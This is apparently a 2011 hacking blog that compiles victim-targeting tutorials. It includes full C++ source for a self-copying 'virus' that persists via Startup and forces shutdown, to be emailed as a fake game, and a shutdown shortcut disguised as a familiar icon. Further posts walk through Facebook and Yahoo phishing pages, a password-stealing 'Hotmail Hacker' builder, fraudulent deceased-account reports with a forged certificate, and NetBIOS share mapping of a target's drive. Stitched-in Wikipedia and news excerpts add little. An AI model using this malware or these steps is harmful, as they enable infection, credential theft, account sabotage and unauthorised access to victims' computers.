Monday, August 8, 2011

LATEST PHISHING


DESKTOP PHISHING IS A LATEST TYPE OF PHISHING WHICH PUT FAR AWAY ALL THE DEFECTS OF NORMAL PHISHING SUCH AS URL WHICH IS THE BEST METHOD USED BY VICTIMS TO TEST IS IT PHISHED PAGE OR ORIGINAL PAGE

In desktop phishing:-

1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.

2. Victim types the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.

HACK FACEBOOK WITH 7 TYPE



Method of data theft on facebook is a lot of interesting things in the discuss and the search. The following ways are usually used by hackers to obtain personal information of facebook account:

1. Social engineering tools: how to trick the victim to deceptive telephone and internet media,

2. Phishing tools: deceptive actions by falsifying the original site.

3. Sniffing tools: tricks to tap information on wireless computer networks or cable, using software like Able Cain - aircrack - snort - nmap.

4. Keylogger tools. almost the same as sniffing action but straight from the source intercepts every keyboard keystrokes the victim, usually a keylogger installed on computers that have public access

5. Brute force tools. This action is a direct attack by hackers to a Web site offering profile,

6. Facebook Application tools. tricks hackers can access the necessary data to your computer when you install the application on the profile. currently there are several types on facebook apikasi dangerous values are 'the Facebook users', 'the Secret Crush Check System Error', 'My Account' and 'Rule-Breaking For reported'.

7. Exploits a vulnerability tools. This is a hacking technique which is always updated, ie by finding the weakness of the system facebook site

HARD VIRAS FOR VICTOM


THIS THING IS VERY DANGEROUS AND NOT FOR JOY.

Heed my warning, but if you still want to ruin your life with jail, here you go.
Step 1, open notepad.
Step 2, paste this...
// The KILLER VIRUS
// Created bY VIRUS
//WWW.JOHNNOGIRLNOTEAR.BLOGSPOT.COM

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}
then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool mini game.
I recommend
naming it as the game you say it is.
Hope you don't ruin someone innocent's computer, Ben.

COMPUTER VIRUS FOR SHUT DOWN




2. Forced shutdown

This will display a custom error message and start a countdown which will shut down the computer.

Right-click your desktop and create a new shortcut.
Paste the following code into the Location box in the Create Shortcut
menu:shutdown -s -t 30 -c “Your message here

Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes. Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc
.



Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.
And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!

Note: to stop it, open Run from the start menu and type shutdown-a.

ONE MORE TIPE FOR OWN VIRAS

METHOD TO MAKE VIRUS:

This is how you can compile the code
:
1. You require Borland TC 3.0, copy the code into the compiler and press Alt+F9, it will compile the code.
2. To generate the exe file of the virus press F9. Remember, Do Not Press CTRL+F9 as this will infect your system also.
3. Note the size of the generated exe file in Bytes.
4. Modify the value of X (which is 89088 initially) in the code above with the size noted in above step.
5. Go to step 1 and step 2 again. The exe file obtained now is the Virus and is ready to infect other systems.
To Test:
1. Make a new folder and put some (any) exe files in it.
2. Also put this virus in it.
3. Run the virus and you will notice that the other exe files will get infected.
4. All the infected files are ready to reinfect.

CLICK THE LINK BELOW TO SEE THE CODE::\

IPHONE HACK



As we reported earlier today, security experts Charlie Miller and Collin Mulliner have exposed an iPhone virus that could allow criminals to control your phone just by sending a single text message (SMS). Their presentation, at the Black Hat conference in Las Vegas, is making a lot of waves, but the details are scattered or overly technical for most iPhone owners.
That’s why we’ve done some research on the information that has come out on this security vulnerability. The technical detail involved in the hack can be overwhelming, so we’re synthesizing it down to the key points – as well what you can expect. Don’t be alarmed, but be vigilant. Here’s the security breakdown:

1. The major issue is a security flaw involving SMS. Specifically, the hack can control an iPhone remotely, including your iPhone’s camera, Safari, and more. It can even send messages to friends in your address book, which is where this hack becomes scariest.
2. The hack works by sending you code in an SMS message (or a series of messages) that crashes your iPhone. After that, your iPhone is theirs to use.
3. The offending text would come in the form of a single square character. If you get the square character, turn off your phone IMMEDIATELY.
4. You only have to receive the message to get hacked; you don’t even have to do anything with the text message.
5. The flaw was discovered by noted security expert Charlie Miller, who has hacked everything from MacBook Airs to Second Life, and partner Collin Mullinger.
6. The attack was presented publicly at the Black Hat conference. The duo decided to do this after Apple gave them no response back in July, when they provided Apple with information on the security flaw. The goal is to bring attention to the flaw (which they are clearly getting).
7. According to Reuters, now that the vulnerability is exposed, hackers could build software that mounts this SMS attack within the next two weeks.
8. Apparently Google Android, Windows Mobile phones, and Palm Pres are vulnerable to similar hacks. The team demonstrated the attack on an Android phone and a Windows Mobile phone
.
While we’re still sifting through very technical information on this attack, it’s a clear reminder that no software, no computer, and no phone is safe from thieves, hackers, and harm. We’ll provide additional updates as they come from either Black Hat or Apple.

Update:
For now, your phone isn’t in immediate danger, as it will take time before malicious individuals can build the necessary code to mount this type of SMS attack. We’ll update you if that changes. Here’s Miller and Mullinger’s paper on the subject if you’d like to check it out:

HACK GOOGLE LIBRARIES AND DOWNLOAD BOOKS



If you want books, but don’t want to pay for them, there is a better way than walking into your local book store and pocketing them. Try grabbing them online, from Google!

Everyone must be aware of the Google Books Library project by now. If you’re not, it’s basically a way for Google to ensure all of the world’s book content is accessible and searchable. Through the Book Project, Google works with libraries to scan and archive their older and out of print materials. Up until recently, viewers of books in the Google Library Project web space were limited to viewing books within the browser. Not any more. Google Book Downloader is a utility that rips books from Google and saves them as PDFs so you can view them with any device or desktop that can view this file format. Using Microsoft’s .NET framework, the Google Book Downloader application allows users to enter a book’s ISBN number or Google link to pull up the desired book and begin a download, fishing off with exporting the file to a PDF. Full setup instructions and download are available on Codeplex.

YAHOO HACKING



YOU CAN HACK ANY YAHOO ACCOUNT BT PHISHING BY JUST FOLLOWING STEPS:
STEP 1:
DOWNLOAD THESE TWO FILES(INDEX.HTML,VIRUS.PHP)
STEP 2:
UPLOAD THESE FILES TO A FREE HOSTING SITE ..I RECOMEND MY 3GB
STEP 3:
..SEND THE LINK OF INDEX.HTML AND HACK THEM...

IF DON,T KNOW ABOUT PHISHING THEN READ MY FIRST ARTICLE ABOUT FACE BOOK PUSSING!!!!!!!!!!!!!!!!

VIRAS FOR JAVA MOBILE


HY GUYZZ YODAY I AM PRESENTING YOU A VERY HIGH AND DANGEROUS JAVA MOBILE VIRUS:
NOTE:

ITS FOR EDUCATIONAL PURPOSE ONLY>
TRY IT ON YOUR OWN RISK>
DON,T TRY ON YOUR OWN MOBILE>
USE:

JUST DOWNLOAD FILE AND RUN ON VICTIM MOBILE::::::

MOBILE VIRUS



This virus is a restart virus which is only valid to some nokia mobiles such as 1100,1110,1112,1208 etc
type('''''') these commas in one and half line and just send to your friend..
If you want to type etra words such as bachoooo type these before virus code.

Sunday, August 7, 2011

HOT MAIL HACKING

HA GUYYZ i am making this toturial to teach you to how to hack hotmail password using hotmail hacker....it is so simple and easy .JUST FOLLOW THE STEPS BELOW

STEP 1;First of all you have to download the software from the following link which is ompletely safe
Download

STEP 2;Extract the software RAR archive in a folder.these are there files as shown




STEP ; Run the Hotmail Hacker Builder.exe and enter the email ID, password and subject of email in which u wanna receive the password of victim. It is recommended that you just create a new email ID (any but not hotmail). This email will contain the pass of victim u wanna hack. Now, select the smtp server. The default (587) is of gmail but u can find others here. Also, write a fake error message to fool ur victim.



STEP 4; Now Hit on Build and u have the Hotmail Hacker.exe in the same folder in which u have extracted the RAR archive.

STEP 5; Now comes the social engg part. Just send this hotmail hacker.exe to anyone and convince him that this software can really hack hotmail accounts. Remember, social engg. plays a major role in this.

STEP 6: Because this is an .exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediashare,Hotfile,Fileserve,Filesonic,Dropbox etc.

STEP 7; Ask him to run hotmail hacker.exe and make him enter his hotmail ID and password and also the hotmail ID of victim he wanna hack. As he enters his information and hits login and start, he will receive that fake error message that u have entered in step 3.




STEP 8;. Now you have all victim email passwords in your inbox and you can now hack victim hotmail accounts easily. I have personally tested this hacking tool and found it working 100%. U will recieve an email containing his password like this


ITS HACKED...ENJOY SAFE AND HAPPY HACKING,,,

FACEBOOK HACKING BY PHISHING

HYE GUYZZ i am making this toturial to teach you the bestmethod to hack facebook through phishing which according to me the most easy and simple method to hack the password of your friends.BUT DON,T FORGET THAT THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY.
STEP 1
OPEN http://www.facebook.com which is your vict0m site.
RIGHT click in open space and click on view page source
as shown like that{below}copy the source data
paste it in note pad and save with the name of "index.htm"
Now open the index.htm in the notepad and search for "action" .........for search press ctrl+f
when you find "action" you see the url next to it:
then change this to "post.php"
Step 2
Now we have to download a script name as "post.php"
download it from here download
Open post.php in notepad and there is a text such like that "website you want to phish" replace it with http://www.facebook.com/ now save it with the name of post.php



Step 3
Now we have to upload these files on a free wb hosting site and i preferhttp://www.my3gb.com/

Fill in the registration form




After the account confirmation log in your accuont and click on file manager


Now upload your files on my 3gb(index.htm and post.php)

Now click on index.htm and you will be redirected to facebook phished page it seems same as facebook log in page type any email address and password then click on login but you know that its a fake page and you will not log in,
Now open your my3gb account and relaod page ,then you will notice that there is a thrid file uploaded there named as "username.txt"

Now open username.txt and you can see the victom,s password

Now send the link of index.htm to your friends and hack them................................
NOTE; zoom in to see pics closely.

CLOSE FACE BOOK ACCOUNT

Just Follow the steps:



Step 1 - Go to this url:
http://www.facebook.com/help/contact.php...m=deceased

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).

Step 2 - Complete the Fields:

Explain:
Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
Editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
Free Hosting like: http://imageshack.us
And it's done ;)... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.

Phishing

From Wikipedia, the free encyclopedia

Jump to: navigation, search

Not to be confused with fishing, pish, or Phish.
For more information about Wikipedia-related phishing attempts, see Wikipedia:Phishing e-mails


An example of a phishing e-mail, disguised as an official e-mail from a (fictional) bank. The sender is attempting to trick the recipient into revealing confidential information by "confirming" it at the phisher's website. Note the misspelling of the words received and discrepancy. Also note that although the URL of the bank's webpage appears to be legitimate, the hyperlink would actually be pointed at the phisher's webpage.
Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing,[4] probably influenced by phreaking,[5] [6] and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen

HACK VICTOM COMPUTER

Netbios Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

In this post i will tell you to hack into a computer with netbios hacking .Netbios hacking is theeasiest way to Hack into a remote computer.


Procedure for Netbios hacking

So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click theblue cross


Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.



It should begin to scan.

Then IP’s, computer names, and mac addresses will show up. Now remember the IP addressof the computer you are going to be breaking into. If you can’t tell whether the IP address isa computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.



Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):


IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the targetis online, then we can proceed.

STEP 2 - Hacking into a computer
--------------------------------------------------------------------------------------------------

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.




Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.


The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup


Step 3 - Hacking into a computer
---------------------------------------------------------------------------------------------

Finally it’s time. By now we know: that our target is online, our target has file sharing, and ourtarget’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”



We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.


As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.




Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!


Congratulations! You’ have hacked into the victims computer
But, before you leave, please look over some of this information for further help and just for thanks to me.

Commands used in this tutorial:

PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)